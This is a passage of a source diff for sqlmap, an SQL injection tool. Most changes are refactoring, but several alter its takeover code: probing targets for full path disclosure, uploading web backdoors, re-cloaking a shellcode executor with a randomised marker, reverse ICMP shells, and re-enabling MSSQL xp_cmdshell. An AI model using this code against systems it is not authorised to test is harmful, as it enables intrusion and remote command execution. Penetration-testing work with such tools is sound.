agent.prefixQuery(kb.injection.data[kb.technique].vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) @@ -358,7 +364,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser if conf.direct: value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) - elif any(map(isTechniqueAvailable, getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True))): + elif any(isTechniqueAvailable(_) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True)): query = cleanQuery(expression) query = expandAsteriskForColumns(query) value = None @@ -407,7 +413,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - if found and conf.dnsName: + if found and conf.dnsDomain: _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items()))) warnMsg = "option '--dns-domain' will be 
ignored " warnMsg += "as faster techniques are usable " @@ -426,6 +432,8 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: + kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", re.sub(r"(?i)(\w+)\(.+\)", r"\g<1>", expression))) if re.search(r"(?i)SELECT.+FROM", expression) else None + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): kb.technique = PAYLOAD.TECHNIQUE.TIME else: @@ -435,7 +443,6 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) - else: errMsg = "none of the injection types identified can be " errMsg += "leveraged to retrieve queries output" @@ -443,6 +450,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser finally: kb.resumeValues = True + kb.responseTimeMode = None conf.tbl = popValue() conf.db = popValue() diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py index 5fd203561..68e1f22a8 100644 --- a/lib/request/methodrequest.py +++ b/lib/request/methodrequest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py index ea3aa7aad..50b93b276 100644 --- a/lib/request/pkihandler.py +++ b/lib/request/pkihandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,12 +11,13 @@ import urllib2 from lib.core.data import conf class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): - def __init__(self, key_file): + def __init__(self, auth_file): urllib2.HTTPSHandler.__init__(self) - self.key_file = key_file + self.auth_file = auth_file def https_open(self, req): return self.do_open(self.getConnection, req) def getConnection(self, host, timeout=None): - return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout) + # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain + return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py index 8288be55e..4eb802d37 100644 --- a/lib/request/rangehandler.py +++ b/lib/request/rangehandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 73fa73f19..a6e560bcf 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import re import types import urllib2 import urlparse 
@@ -30,6 +31,7 @@ from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.threads import getCurrentThreadData from lib.request.basic import decodePage +from lib.request.basic import parseResponse class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def _get_header_redirect(self, headers): @@ -37,9 +39,9 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): if headers: if "location" in headers: - retVal = headers.getheaders("location")[0].split("?")[0] + retVal = headers.getheaders("location")[0] elif "uri" in headers: - retVal = headers.getheaders("uri")[0].split("?")[0] + retVal = headers.getheaders("uri")[0] return retVal @@ -48,18 +50,16 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): if kb.redirectChoice is None: msg = "sqlmap got a %d redirect to " % redcode msg += "'%s'. Do you want to follow? [Y/n] " % redurl - choice = readInput(msg, default="Y") - kb.redirectChoice = choice.upper() + kb.redirectChoice = REDIRECTION.YES if readInput(msg, default='Y', boolean=True) else REDIRECTION.NO if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: msg = "redirect is a result of a " msg += "POST request. Do you want to " msg += "resend original POST data to a new " msg += "location? [%s] " % ("Y/n" if not kb.originalPage else "y/N") - choice = readInput(msg, default=("Y" if not kb.originalPage else "N")) - kb.resendPostOnRedirect = choice.upper() == 'Y' + kb.resendPostOnRedirect = readInput(msg, default=('Y' if not kb.originalPage else 'N'), boolean=True) if kb.resendPostOnRedirect: self.redirect_request = self._redirect_request @@ -70,7 +70,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def http_error_302(self, req, fp, code, msg, headers): content = None - redurl = self._get_header_redirect(headers) + redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None try: content = fp.read(MAX_CONNECTION_TOTAL_SIZE) @@ -118,9 +118,16 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): result = fp if redurl and kb.redirectChoice == REDIRECTION.YES: + parseResponse(content, headers) + req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) if headers and HTTP_HEADER.SET_COOKIE in headers: - req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0] + delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER + _ = headers[HTTP_HEADER.SET_COOKIE].split(delimiter)[0] + if HTTP_HEADER.COOKIE not in req.headers: + req.headers[HTTP_HEADER.COOKIE] = _ + else: + req.headers[HTTP_HEADER.COOKIE] = re.sub("%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" 
% (_.split('=')[0], delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter)) try: result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) except urllib2.HTTPError, e: diff --git a/lib/request/templates.py b/lib/request/templates.py index b95173ff9..0fb74f966 100644 --- a/lib/request/templates.py +++ b/lib/request/templates.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -13,7 +13,7 @@ def getPageTemplate(payload, place): if payload and place: if (payload, place) not in kb.pageTemplates: - page, _ = Request.queryPage(payload, place, content=True, raise404=False) + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) retVal = kb.pageTemplates[(payload, place)] diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/takeover/__init__.py +++ b/lib/takeover/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 20ff60fc5..f5ef9edaf 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -25,13 +25,13 @@ from lib.core.shell import autoCompletion from lib.request import inject from lib.takeover.udf import UDF from lib.takeover.web import Web -from lib.takeover.xp_cmdshell import Xp_cmdshell +from lib.takeover.xp_cmdshell import XP_cmdshell -class Abstraction(Web, UDF, Xp_cmdshell): +class Abstraction(Web, UDF, XP_cmdshell): """ This class defines an abstraction layer for OS takeover functionalities - to UDF / Xp_cmdshell objects + to UDF / XP_cmdshell objects """ def __init__(self): @@ -40,7 +40,7 @@ class Abstraction(Web, UDF, Xp_cmdshell): UDF.__init__(self) Web.__init__(self) - Xp_cmdshell.__init__(self) + XP_cmdshell.__init__(self) def execCmd(self, cmd, silent=False): if self.webBackdoorUrl and not isStackingAvailable(): @@ -75,17 +75,17 @@ class Abstraction(Web, UDF, Xp_cmdshell): return safechardecode(retVal) def runCmd(self, cmd): - getOutput = None + choice = None if not self.alwaysRetrieveCmdOutput: message = "do you want to retrieve the command standard " message += "output? [Y/n/a] " - getOutput = readInput(message, default="Y") + choice = readInput(message, default='Y') - if getOutput in ("a", "A"): + if choice in ('a', 'A'): self.alwaysRetrieveCmdOutput = True - if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput: + if not choice or choice in ('y', 'Y') or self.alwaysRetrieveCmdOutput: output = self.evalCmd(cmd) if output: @@ -166,9 +166,8 @@ class Abstraction(Web, UDF, Xp_cmdshell): msg += "statements as another DBMS user since you provided the " msg += "option '--dbms-creds'. If you are DBA, you can enable it. " msg += "Do you want to enable it? 
[Y/n] " - choice = readInput(msg, default="Y") - if not choice or choice in ("y", "Y"): + if readInput(msg, default='Y', boolean=True): expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1") inject.goStacked(expression) diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index 35cfe9881..3df18cf55 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -1,11 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os +import re +import socket import time from extra.icmpsh.icmpsh_m import main as icmpshmaster @@ -18,6 +20,7 @@ from lib.core.common import readInput from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths +from lib.core.exception import SqlmapDataException class ICMPsh: """ @@ -32,18 +35,50 @@ class ICMPsh: self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_")) def _selectRhost(self): - message = "what is the back-end DBMS address? [%s] " % self.remoteIP - address = readInput(message, default=self.remoteIP) + address = None + message = "what is the back-end DBMS address? " + + if self.remoteIP: + message += "[Enter for '%s' (detected)] " % self.remoteIP + + while not address: + address = readInput(message, default=self.remoteIP) + + if conf.batch and not address: + raise SqlmapDataException("remote host address is missing") return address def _selectLhost(self): - message = "what is the local address? [%s] " % self.localIP - address = readInput(message, default=self.localIP) + address = None + message = "what is the local address? " + + if self.localIP: + message += "[Enter for '%s' (detected)] " % self.localIP + + valid = None + while not valid: + valid = True + address = readInput(message, default=self.localIP or "") + + try: + socket.inet_aton(address) + except socket.error: + valid = False + finally: + valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None + + if conf.batch and not address: + raise SqlmapDataException("local host address is missing") + elif address and not valid: + warnMsg = "invalid local host address" + logger.warn(warnMsg) return address def _prepareIngredients(self, encode=True): + self.localIP = getattr(self, "localIP", None) + self.remoteIP = getattr(self, "remoteIP", None) self.lhostStr = ICMPsh._selectLhost(self) self.rhostStr = ICMPsh._selectRhost(self) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 8717b6c73..fcfe16100 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -1,17 +1,21 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re +import select import sys +import tempfile import time from subprocess import PIPE +from extra.cloak.cloak import cloak +from extra.cloak.cloak import decloak from lib.core.common import dataToStdout from lib.core.common import Backend from lib.core.common import getLocalIP @@ -34,6 +38,7 @@ from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.settings import IS_WIN from lib.core.settings import METASPLOIT_SESSION_TIMEOUT +from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER from lib.core.settings import 
UNICODE_ENCODING from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingWriteToFD @@ -43,8 +48,6 @@ from lib.core.subprocessng import recv_some if IS_WIN: import msvcrt -else: - from select import select class Metasploit: """ @@ -288,7 +291,7 @@ class Metasploit: def _selectRhost(self): if self.connectionStr.startswith("bind"): - message = "what is the back-end DBMS address? [%s] " % self.remoteIP + message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP address = readInput(message, default=self.remoteIP) if not address: @@ -304,7 +307,7 @@ class Metasploit: def _selectLhost(self): if self.connectionStr.startswith("reverse"): - message = "what is the local address? [%s] " % self.localIP + message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP address = readInput(message, default=self.localIP) if not address: @@ -348,7 +351,7 @@ class Metasploit: self._cliCmd += " E" else: - self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd = "%s -L -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) self._cliCmd += "; set EXITFUNC %s" % exitfunc self._cliCmd += "; set LPORT %s" % self.portStr @@ -426,10 +429,12 @@ class Metasploit: self._payloadCmd += " X > \"%s\"" % outFile else: if extra == "BufferRegister=EAX": - self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile) + self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format) if extra is not None: self._payloadCmd += " %s" % extra + + self._payloadCmd += " > \"%s\"" % outFile else: self._payloadCmd += " -f exe > \"%s\"" % outFile @@ -546,7 +551,7 @@ class Metasploit: # Probably the child has exited pass else: - ready_fds = select([stdin_fd], [], [], 1) + ready_fds = select.select([stdin_fd], [], [], 1) if stdin_fd in ready_fds[0]: try: @@ -594,8 +599,10 @@ class Metasploit: else: proc.kill() - except (EOFError, IOError): + except (EOFError, IOError, select.error): return proc.returncode + except KeyboardInterrupt: + pass def createMsfShellcode(self, exitfunc, format, extra, encode): infoMsg = "creating Metasploit Framework multi-stage shellcode " @@ -615,7 +622,7 @@ class Metasploit: pollProcess(process) payloadStderr = process.communicate()[1] - match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr) + match = re.search("(Total size:|Length:|succeeded with size|Final size of exe file:) ([\d]+)", payloadStderr) if match: payloadSize = int(match.group(2)) @@ -640,6 +647,14 @@ class Metasploit: if Backend.isOs(OS.WINDOWS): self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") + content = decloak(self.shellcodeexecLocal) + if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: + content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))) + _ = cloak(data=content) + handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") + os.close(handle) + with open(self.shellcodeexecLocal, "w+b") as f: + f.write(_) else: self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index fbeff3490..6a5a2f39d 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers 
(http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index aa10b3c63..b57d2c81e 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -42,12 +42,8 @@ class UDF: def _askOverwriteUdf(self, udf): message = "UDF '%s' already exists, do you " % udf message += "want to overwrite it? [y/N] " - output = readInput(message, default="N") - if output and output[0] in ("y", "Y"): - return True - else: - return False + return readInput(message, default='N', boolean=True) def _checkExistUdf(self, udf): logger.info("checking if UDF '%s' already exist" % udf) @@ -158,9 +154,8 @@ class UDF: message = "do you want to proceed anyway? Beware that the " message += "operating system takeover will fail [y/N] " - choice = readInput(message, default="N") - if choice and choice.lower() == "y": + if readInput(message, default='N', boolean=True): written = True else: return False @@ -241,9 +236,9 @@ class UDF: msg += "from the shared library? " while True: - udfCount = readInput(msg, default=1) + udfCount = readInput(msg, default='1') - if isinstance(udfCount, basestring) and udfCount.isdigit(): + if udfCount.isdigit(): udfCount = int(udfCount) if udfCount <= 0: @@ -251,14 +246,10 @@ class UDF: return else: break - - elif isinstance(udfCount, int): - break - else: logger.warn("invalid value, only digits are allowed") - for x in range(0, udfCount): + for x in xrange(0, udfCount): while True: msg = "what is the name of the UDF number %d? " % (x + 1) udfName = readInput(msg) @@ -276,31 +267,27 @@ class UDF: self.udfs[udfName]["input"] = [] - default = 1 msg = "how many input parameters takes UDF " - msg += "'%s'? (default: %d) " % (udfName, default) + msg += "'%s'? (default: 1) " % udfName while True: - parCount = readInput(msg, default=default) + parCount = readInput(msg, default='1') - if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0: + if parCount.isdigit() and int(parCount) >= 0: parCount = int(parCount) break - elif isinstance(parCount, int): - break - else: logger.warn("invalid value, only digits >= 0 are allowed") - for y in range(0, parCount): + for y in xrange(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? (default: %s) " % ((y + 1), defaultType) while True: - parType = readInput(msg, default=defaultType) + parType = readInput(msg, default=defaultType).strip() - if isinstance(parType, basestring) and parType.isdigit(): + if parType.isdigit(): logger.warn("you need to specify the data-type of the parameter") else: @@ -327,12 +314,12 @@ class UDF: msg = "do you want to call your injected user-defined " msg += "functions now? 
[Y/n/q] " - choice = readInput(msg, default="Y") + choice = readInput(msg, default='Y').upper() - if choice[0] in ("n", "N"): + if choice == 'N': self.cleanup(udfDict=self.udfs) return - elif choice[0] in ("q", "Q"): + elif choice == 'Q': self.cleanup(udfDict=self.udfs) raise SqlmapUserQuitException @@ -347,9 +334,9 @@ class UDF: msg += "\n[q] Quit" while True: - choice = readInput(msg) + choice = readInput(msg).upper() - if choice and choice[0] in ("q", "Q"): + if choice == 'Q': break elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): choice = int(choice) @@ -390,9 +377,8 @@ class UDF: cmd = cmd[:-1] msg = "do you want to retrieve the return value of the " msg += "UDF? [Y/n] " - choice = readInput(msg, default="Y") - if choice[0] in ("y", "Y"): + if readInput(msg, default='Y', boolean=True): output = self.udfEvalCmd(cmd, udfName=udfToCall) if output: @@ -403,9 +389,8 @@ class UDF: self.udfExecCmd(cmd, udfName=udfToCall, silent=True) msg = "do you want to call this or another injected UDF? [Y/n] " - choice = readInput(msg, default="Y") - if choice[0] not in ("y", "Y"): + if not readInput(msg, default='Y', boolean=True): break self.cleanup(udfDict=self.udfs) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 40a403dc0..73b9fe707 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,10 +9,9 @@ import os import posixpath import re import StringIO +import tempfile import urlparse -from tempfile import mkstemp - from extra.cloak.cloak import decloak from lib.core.agent import agent from lib.core.common import arrayizeValue @@ -27,6 +26,7 @@ from lib.core.common import ntToPosixSlashes from lib.core.common import isTechniqueAvailable from lib.core.common import isWindowsDriveLetterPath from lib.core.common import normalizePath +from lib.core.common import parseFilePaths from lib.core.common import posixToNtSlashes from lib.core.common import randomInt from lib.core.common import randomStr @@ -39,8 +39,10 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import OS from lib.core.enums import PAYLOAD +from lib.core.enums import PLACE from lib.core.enums import WEB_API from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT @@ -117,7 +119,7 @@ class Web: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE - page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) + page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) if "File uploaded" not in page: warnMsg = "unable to upload the file through the web file " @@ -197,15 +199,76 @@ class Web: self.webApi = choices[int(choice) - 1] break + if not kb.absFilePaths: + message = "do you want sqlmap to further try to " + message += "provoke the full path disclosure? 
[Y/n] " + + if readInput(message, default='Y', boolean=True): + headers = {} + been = set([conf.url]) + + for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I): + url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url) + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + for place in (PLACE.GET, PLACE.POST): + if place in conf.parameters: + value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place]) + if "[]" in value: + page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + cookie = None + if PLACE.COOKIE in conf.parameters: + cookie = conf.parameters[PLACE.COOKIE] + elif headers and HTTP_HEADER.SET_COOKIE in headers: + cookie = headers[HTTP_HEADER.SET_COOKIE] + + if cookie: + value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + directories = list(arrayizeValue(getManualDirectories())) directories.extend(getAutoDirectories()) directories = list(oset(directories)) + path = urlparse.urlparse(conf.url).path or '/' + if path != '/': + _ = [] + for directory in directories: + _.append(directory) + if not directory.endswith(path): + _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) + directories = _ + backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) - success = False for directory in directories: if not directory: @@ -219,8 +282,6 @@ class Web: if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'): directory = "/%s" % directory - else: - directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory if not directory.endswith('/'): directory += '/' @@ -258,10 +319,10 @@ class Web: stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - handle, filename = mkstemp() - os.fdopen(handle).close() # close low level handle (causing problems later) + handle, filename = tempfile.mkstemp() + os.close(handle) - with open(filename, "w+") as f: + with open(filename, "w+b") as f: _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) f.write(_) @@ -309,7 +370,7 @@ class Web: _ = "tmpe%s.exe" % randomStr(lowercase=True) if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)): 
- self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_')) + self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory else: @@ -329,9 +390,8 @@ class Web: message = "do you want to try the same method used " message += "for the file stager? [Y/n] " - getOutput = readInput(message, default="Y") - if getOutput in ("y", "Y"): + if readInput(message, default='Y', boolean=True): self._webFileInject(backdoorContent, backdoorName, directory) else: continue @@ -357,6 +417,4 @@ class Web: infoMsg += self.webBackdoorUrl logger.info(infoMsg) - success = True - break diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index f9c5f0b8f..6c9fd6928 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -33,7 +33,7 @@ from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.threads import getCurrentThreadData from lib.request import inject -class Xp_cmdshell: +class XP_cmdshell: """ This class defines methods to deal with Microsoft SQL Server xp_cmdshell extended procedure for plugins. @@ -45,7 +45,7 @@ class Xp_cmdshell: def _xpCmdshellCreate(self): cmd = "" - if Backend.isVersionWithin(("2005", "2008", "2012")): + if not Backend.isVersionWithin(("2000",)): logger.debug("activating sp_OACreate") cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") @@ -56,7 +56,7 @@ class Xp_cmdshell: cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr) - if Backend.isVersionWithin(("2005", "2008")): + if not Backend.isVersionWithin(("2000",)): cmd += ";RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd)) @@ -83,10 +83,10 @@ class Xp_cmdshell: return cmd def _xpCmdshellConfigure(self, mode): - if Backend.isVersionWithin(("2005", "2008")): - cmd = self._xpCmdshellConfigure2005(mode) - else: + if Backend.isVersionWithin(("2000",)): cmd = self._xpCmdshellConfigure2000(mode) + else: + cmd = self._xpCmdshellConfigure2005(mode) inject.goStacked(agent.runAsDBMSUser(cmd)) @@ -111,8 +111,8 @@ class Xp_cmdshell: errMsg += "storing console output within the back-end file system " errMsg += "does not have writing permissions for the DBMS process. " errMsg += "You are advised to manually adjust it with option " - errMsg += "--tmp-path switch or you will not be able to retrieve " - errMsg += "the commands output" + errMsg += "'--tmp-path' or you won't be able to retrieve " + errMsg += "the command(s) output" logger.error(errMsg) elif isNoneValue(output): logger.error("unable to retrieve xp_cmdshell output") @@ -255,9 +255,8 @@ class Xp_cmdshell: message = "xp_cmdshell extended procedure does not seem to " message += "be available. Do you want sqlmap to try to " message += "re-enable it? 
